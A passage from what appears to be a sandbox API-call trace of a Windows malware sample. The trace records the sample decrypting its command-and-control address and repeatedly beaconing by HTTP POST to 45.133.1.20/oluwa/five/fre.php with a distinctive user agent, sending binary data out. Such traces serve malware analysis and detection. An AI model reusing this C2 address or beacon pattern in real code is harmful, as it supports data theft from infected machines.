param_1=0x6c5ef0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0195.564] GetProcessHeap () returned 0x6a0000 [0195.564] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bb458 [0195.565] GetProcessHeap () returned 0x6a0000 [0195.565] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5ef0 | out: hHeap=0x6a0000) returned 1 [0195.565] GetProcessHeap () returned 0x6a0000 [0195.565] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0195.565] GetProcessHeap () returned 0x6a0000 [0195.565] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c5ef0 [0195.567] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0195.568] wvsprintfA (in: param_1=0x6c5ef0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0195.568] GetProcessHeap () returned 0x6a0000 [0195.568] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0195.569] GetProcessHeap () returned 0x6a0000 [0195.569] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5ef0 | out: hHeap=0x6a0000) returned 1 [0195.569] send (s=0x4dc, buf=0x6b5c98*, len=242, flags=0) returned 242 [0195.570] send (s=0x4dc, buf=0x6bb998*, len=159, flags=0) returned 159 [0195.570] GetProcessHeap () returned 0x6a0000 [0195.570] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0195.570] recv (in: s=0x4dc, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0195.638] GetProcessHeap () returned 0x6a0000 [0195.638] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0195.639] GetProcessHeap () returned 0x6a0000 [0195.639] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0195.639] GetProcessHeap () returned 0x6a0000 [0195.640] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0195.640] GetProcessHeap () returned 0x6a0000 [0195.640] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0195.640] closesocket (s=0x4dc) returned 0 [0195.640] GetProcessHeap () returned 0x6a0000 [0195.640] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa00 | out: hHeap=0x6a0000) returned 1 [0195.640] GetProcessHeap () returned 0x6a0000 [0195.641] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0195.641] GetProcessHeap () returned 0x6a0000 [0195.641] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0195.641] GetProcessHeap () returned 0x6a0000 [0195.641] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0195.642] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x944) returned 0x4dc [0195.643] Sleep (dwMilliseconds=0xea60) [0195.645] GetProcessHeap () returned 0x6a0000 [0195.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0195.645] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0195.646] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0195.652] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0195.653] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0195.691] GetProcessHeap () returned 0x6a0000 [0195.691] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6c5808 [0195.692] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0195.695] CryptImportKey (in: hProv=0x6bf278, pbData=0x6c5808, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0195.709] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0195.710] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0195.711] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0195.711] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0195.711] GetProcessHeap () returned 0x6a0000 [0195.712] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5808 | out: hHeap=0x6a0000) returned 1 [0195.713] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0195.713] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0195.719] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0195.719] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0195.720] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0195.720] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0195.720] GetProcessHeap () returned 0x6a0000 [0195.720] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0195.721] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0195.722] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0195.723] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0195.723] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0195.724] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0195.724] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0195.725] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0195.725] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0195.725] GetProcessHeap () returned 0x6a0000 [0195.725] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0195.726] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0195.726] GetProcessHeap () returned 0x6a0000 [0195.726] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0195.726] GetProcessHeap () returned 0x6a0000 [0195.727] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0195.727] GetProcessHeap () returned 0x6a0000 [0195.727] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0195.727] GetProcessHeap () returned 0x6a0000 [0195.727] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0195.728] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0195.731] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0195.738] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0195.739] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0195.750] GetProcessHeap () returned 0x6a0000 [0195.750] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0195.754] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0195.754] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0195.755] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0195.755] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0195.756] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0195.757] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0195.757] GetProcessHeap () returned 0x6a0000 [0195.757] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0195.758] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0195.759] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0195.760] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0195.761] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0195.762] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0195.762] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0195.762] GetProcessHeap () returned 0x6a0000 [0195.762] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0195.763] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0195.763] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0195.764] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0195.764] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0195.765] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0195.765] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0195.765] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0195.766] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0195.766] GetProcessHeap () returned 0x6a0000 [0195.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0195.766] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0195.766] GetProcessHeap () returned 0x6a0000 [0195.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baab0 [0195.766] socket (af=2, type=1, protocol=6) returned 0x4e0 [0195.766] connect (s=0x4e0, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0195.802] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0195.802] GetProcessHeap () returned 0x6a0000 [0195.802] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6befd0 [0195.802] GetProcessHeap () returned 0x6a0000 [0195.802] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0195.803] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0195.804] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0195.804] GetProcessHeap () returned 0x6a0000 [0195.804] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bb458 [0195.804] GetProcessHeap () returned 0x6a0000 [0195.805] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0195.805] GetProcessHeap () returned 0x6a0000 [0195.805] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0195.805] GetProcessHeap () returned 0x6a0000 [0195.805] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0195.806] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0195.806] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0195.806] GetProcessHeap () returned 0x6a0000 [0195.806] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0195.807] GetProcessHeap () returned 0x6a0000 [0195.807] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0195.807] send (s=0x4e0, buf=0x6b5c98*, len=242, flags=0) returned 242 [0195.808] send (s=0x4e0, buf=0x6bb998*, len=159, flags=0) returned 159 [0195.808] GetProcessHeap () returned 0x6a0000 [0195.808] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0195.808] recv (in: s=0x4e0, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0195.878] GetProcessHeap () returned 0x6a0000 [0195.878] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0195.878] GetProcessHeap () returned 0x6a0000 [0195.879] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0195.879] GetProcessHeap () returned 0x6a0000 [0195.879] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0195.879] GetProcessHeap () returned 0x6a0000 [0195.879] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6befd0 | out: hHeap=0x6a0000) returned 1 [0195.879] closesocket (s=0x4e0) returned 0 [0195.880] GetProcessHeap () returned 0x6a0000 [0195.880] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baab0 | out: hHeap=0x6a0000) returned 1 [0195.880] GetProcessHeap () returned 0x6a0000 [0195.880] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0195.880] GetProcessHeap () returned 0x6a0000 [0195.881] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0195.881] GetProcessHeap () returned 0x6a0000 [0195.881] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0195.881] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xd9c) returned 0x4e0 [0195.883] Sleep (dwMilliseconds=0xea60) [0195.884] GetProcessHeap () returned 0x6a0000 [0195.884] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0195.885] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0195.886] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0195.891] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0195.891] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0195.900] GetProcessHeap () returned 0x6a0000 [0195.900] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6c5928 [0195.900] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0195.901] CryptImportKey (in: hProv=0x6bef48, pbData=0x6c5928, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0195.902] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0195.902] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0195.903] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0195.904] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0195.904] GetProcessHeap () returned 0x6a0000 [0195.904] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5928 | out: hHeap=0x6a0000) returned 1 [0195.905] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0195.905] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0195.908] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0195.909] CryptDestroyKey (hKey=0x6ad020) returned 1 [0195.910] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0195.910] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0195.910] GetProcessHeap () returned 0x6a0000 [0195.910] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0195.911] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0195.911] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0195.912] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0195.913] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0195.914] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0195.914] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0195.918] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0195.921] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0195.921] GetProcessHeap () returned 0x6a0000 [0195.921] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0195.921] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0195.921] GetProcessHeap () returned 0x6a0000 [0195.922] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0195.922] GetProcessHeap () returned 0x6a0000 [0195.922] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0195.922] GetProcessHeap () returned 0x6a0000 [0195.923] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0195.923] GetProcessHeap () returned 0x6a0000 [0195.923] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0195.925] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0195.925] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0195.932] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0195.932] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0195.940] GetProcessHeap () returned 0x6a0000 [0195.940] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0195.941] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0195.942] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0195.942] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0195.942] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0195.943] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0195.943] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0195.944] GetProcessHeap () returned 0x6a0000 [0195.944] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0195.945] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0195.945] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0195.946] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0195.946] CryptDestroyKey (hKey=0x6ad020) returned 1 [0195.947] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0195.947] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0195.947] GetProcessHeap () returned 0x6a0000 [0195.947] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0195.948] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0195.948] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0195.951] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0195.951] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0195.952] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0195.952] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0195.953] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0195.954] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0195.954] GetProcessHeap () returned 0x6a0000 [0195.954] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0195.954] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0195.954] GetProcessHeap () returned 0x6a0000 [0195.954] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9f0 [0195.954] socket (af=2, type=1, protocol=6) returned 0x4e4 [0195.954] connect (s=0x4e4, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0195.979] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0195.980] GetProcessHeap () returned 0x6a0000 [0195.980] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf168 [0195.980] GetProcessHeap () returned 0x6a0000 [0195.980] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0195.980] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0195.981] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0195.981] GetProcessHeap () returned 0x6a0000 [0195.981] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bb458 [0195.981] GetProcessHeap () returned 0x6a0000 [0195.982] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0195.982] GetProcessHeap () returned 0x6a0000 [0195.982] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0195.982] GetProcessHeap () returned 0x6a0000 